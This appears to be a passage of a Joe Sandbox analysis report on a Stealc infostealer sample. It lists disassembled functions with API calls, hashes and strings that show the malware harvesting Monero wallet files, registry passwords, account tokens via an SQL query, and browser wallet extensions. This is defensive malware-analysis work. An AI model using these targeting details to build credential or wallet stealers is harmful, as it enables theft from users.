DeleteFileA.KERNEL32(00000000), ref: 007714EF
memset.MSVCRT ref: 00771516

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00771335
.keys, xrefs: 0077136B
wallet_path, xrefs: 00771330
\Monero\wallet.keys, xrefs: 0077138D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 3176c94585bf32bf92ab4b8a2a6690c7c8376a48532c66cb7a49e75373f892e3
Instruction ID: ba0f5ebe29eb657e810f971805e000409c5468d64fc5c32d8d22c9263d00501b
Opcode Fuzzy Hash: 3176c94585bf32bf92ab4b8a2a6690c7c8376a48532c66cb7a49e75373f892e3
Instruction Fuzzy Hash: 855157B1D50119A7DB15FB60DD99EED737CAF50300F4041E9B60A62081EE3C6B85CFA6

Function 007870D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 007870DE

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

OpenProcess.KERNEL32(001FFFFF,00000000,0078730D,007905BD), ref: 0078711C
memset.MSVCRT ref: 0078716A
??_V@YAXPAX@Z.MSVCRT(?), ref: 007872BE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0078718C
sx, xrefs: 00787111
sx, xrefs: 007872AE, 00787179, 0078717C

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: sx$sx$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-3185190315
Opcode ID: 4bbdce9d90ff4d9e2ee025492fd5e8ed534adf600c51edbbc04f6f04a8d31def
Instruction ID: 27e6c5adeb46ff4d7be242454fc9465918f46bfa24e1b2bcb47ff62436b1bbd8
Opcode Fuzzy Hash: 4bbdce9d90ff4d9e2ee025492fd5e8ed534adf600c51edbbc04f6f04a8d31def
Instruction Fuzzy Hash: D25141B0D44218EFDB18EB90DC89BEDB774AF54304F2081A9E51666181EB7C6A88CF55

Function 007775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007772D0: memset.MSVCRT ref: 00777314
Part of subcall function 007772D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00777C90), ref: 0077733A
Part of subcall function 007772D0: RegEnumValueA.ADVAPI32(00777C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007773B1
Part of subcall function 007772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0077740D
Part of subcall function 007772D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777452
Part of subcall function 007772D0: HeapFree.KERNEL32(00000000,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777459

lstrcatA.KERNEL32(33548020,007917FC,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?,?,007861C4), ref: 00777606
lstrcatA.KERNEL32(33548020,00000000,00000000), ref: 00777648
lstrcatA.KERNEL32(33548020, : ), ref: 0077765A
lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 0077768F
lstrcatA.KERNEL32(33548020,00791804), ref: 007776A0
lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 007776D3
lstrcatA.KERNEL32(33548020,00791808), ref: 007776ED
task.LIBCPMTD ref: 007776FB

Strings

: , xrefs: 0077764E

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: fcb03b9c9297b41d531438673e42273e45990e4c60904dfec6e6718185e12f4d
Instruction ID: b910c1371a587580c9c9eac3109aa841d245c79063bcaf59ca82f6d6c1b57415
Opcode Fuzzy Hash: fcb03b9c9297b41d531438673e42273e45990e4c60904dfec6e6718185e12f4d
Instruction Fuzzy Hash: B6316FB1914109EFCF48EBB4DD89DFF7378BB44311B548218F106A7290DA38AD46DB62

Function 007772D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00777314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00777C90), ref: 0077733A
RegEnumValueA.ADVAPI32(00777C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007773B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0077740D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777452
HeapFree.KERNEL32(00000000,?,?,?,?,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?), ref: 00777459

Part of subcall function 00779240: vsprintf_s.MSVCRT ref: 0077925B

task.LIBCPMTD ref: 00777555

Strings

Password, xrefs: 00777401

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 45186caa64bc4a2a5d37ca92e97771f8e8ff808abfd8ce5713b2f334c86207cd
Instruction ID: 126786097ce1d54c7073bb164d372fc879172bfa740441ea345d680ce7f835a2
Opcode Fuzzy Hash: 45186caa64bc4a2a5d37ca92e97771f8e8ff808abfd8ce5713b2f334c86207cd
Instruction Fuzzy Hash: 076118B5944168DBDB24DB50CC85BDAB7B8BF44340F00C1E9E64DA6141DBB45BC9CFA1

Function 00787500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00787542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0078757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787603
HeapAlloc.KERNEL32(00000000), ref: 0078760A
wsprintfA.USER32 ref: 00787640

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Strings

:, xrefs: 0078755C
C, xrefs: 0078754C
\, xrefs: 00787560

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 8b845ef862c50d39939ce7e7484d20d452f738d61e176c5bc268f4c12ead5267
Instruction ID: eb8c43253b0eb5dfc3be49234448c96dee0058c7ca779562a6bc7ddf1f08205f
Opcode Fuzzy Hash: 8b845ef862c50d39939ce7e7484d20d452f738d61e176c5bc268f4c12ead5267
Instruction Fuzzy Hash: 3841A6B1E44248EBDF14EF94DC89BDEBBB8EF08710F100199F50967280D778AA44CBA5

Function 00784780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,00CFFBD0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 007847DB

Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

lstrcatA.KERNEL32(?,00000000), ref: 00784801
lstrcatA.KERNEL32(?,?), ref: 00784820
lstrcatA.KERNEL32(?,?), ref: 00784834
lstrcatA.KERNEL32(?,00CFA478), ref: 00784847
lstrcatA.KERNEL32(?,?), ref: 0078485B
lstrcatA.KERNEL32(?,00D00180), ref: 0078486F

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 00788D90: GetFileAttributesA.KERNEL32(00000000,?,00780117,?,00000000,?,00000000,00790DAB,00790DAA), ref: 00788D9F

Part of subcall function 00784570: GetProcessHeap.KERNEL32(00000000,Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx), ref: 00784580
Part of subcall function 00784570: HeapAlloc.KERNEL32(00000000), ref: 00784587
Part of subcall function 00784570: wsprintfA.USER32 ref: 007845A6
Part of subcall function 00784570: FindFirstFileA.KERNEL32(?,?), ref: 007845BD

Strings

0ax, xrefs: 007848F9, 007848A1, 007848A4

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: 0ax
API String ID: 167551676-4178747242
Opcode ID: ce6fdf824e02baf874f4e91cc24d57cd129225b0a5f8a4e2515003c24be70820
Instruction ID: 051ab23e5a0a1d1500500e963c2c17389d14b986fe1b70b6b06f895cbee590a7
Opcode Fuzzy Hash: ce6fdf824e02baf874f4e91cc24d57cd129225b0a5f8a4e2515003c24be70820
Instruction Fuzzy Hash: E13186B2950208A7CB54F7B0DC89EED737CBB58700F404589F31996081EE78AB89CF96

Function 00788100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000), ref: 00788130
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00CFF810,00000000,?,00790E2C,00000000,?,00000000,00000000), ref: 00788137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00788158
__aulldiv.LIBCMT ref: 00788172
__aulldiv.LIBCMT ref: 00788180
wsprintfA.USER32 ref: 007881AC

Strings

%d MB, xrefs: 007881A3
@, xrefs: 0078814D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 4d89b991adab7bafbec617a507cfb29e6869cb7e6c9841028804eef7e90f5349
Instruction ID: 28858646069ce85553267edceda3eb3340e6c4e98ba3243302639aec3e7ed14c
Opcode Fuzzy Hash: 4d89b991adab7bafbec617a507cfb29e6869cb7e6c9841028804eef7e90f5349
Instruction Fuzzy Hash: C4211DF1E44218ABDB14DFD4CD49FAEB7B8FB44B10F104609F605BB280DB7869018BA6

Function 0077BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D

lstrlenA.KERNEL32(00000000), ref: 0077BC9F

Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0077BCCD
lstrlenA.KERNEL32(00000000), ref: 0077BDA5
lstrlenA.KERNEL32(00000000), ref: 0077BDB9

Strings

AccountTokens, xrefs: 0077BB49
AccountId, xrefs: 0077BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0077BBEB
AccountTokens, xrefs: 0077BABA

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
